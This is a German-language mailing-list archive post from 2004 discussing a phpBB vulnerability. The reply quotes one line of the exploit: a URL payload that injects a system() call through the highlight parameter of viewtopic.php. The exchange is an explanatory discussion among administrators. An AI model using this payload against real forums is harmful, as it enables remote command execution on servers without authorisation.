phpbar.de - Mailinglisten-Archive

Mailinglisten-Archive

[php] Frage zu einem exploit (ap)

Daniel Tillner teravolt at gmx.de
Mon Nov 22 21:36:30 CET 2004

Vorherige Nachricht: [php] Frage zu einem exploit (ap)
Nächste Nachricht: [php] Frage zu einem exploit (ap)
Nachrichten sortiert nach: [ Datum ] [ Thema ] [ Betreff (Subject) ] [ Autor ]

> Wie sieht das exploit denn genau aus - ich habe nur die "Lösung" 
> gefunden und auch gleich eingespielt - aber den "Hack" habe ich nicht 
> gesehen.
> 
> Ist das einfach in der Form viewtopic.php?hightlight=ps%20-ef oder 
> sowas?

Anscheinend wurde der Exploit von der Seite genommen. Ich will ihn aber
auch nicht unbedingt hier posten.

Der Interessanteste Teil ist wahrscheinlich dieser:

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%
252e%2527";

MfG

-- 
Daniel Tillner - www.badhat.de

Vorherige Nachricht: [php] Frage zu einem exploit (ap)
Nächste Nachricht: [php] Frage zu einem exploit (ap)
Nachrichten sortiert nach: [ Datum ] [ Thema ] [ Betreff (Subject)] [ Autor ]

php::bar PHP Wiki - Listenarchive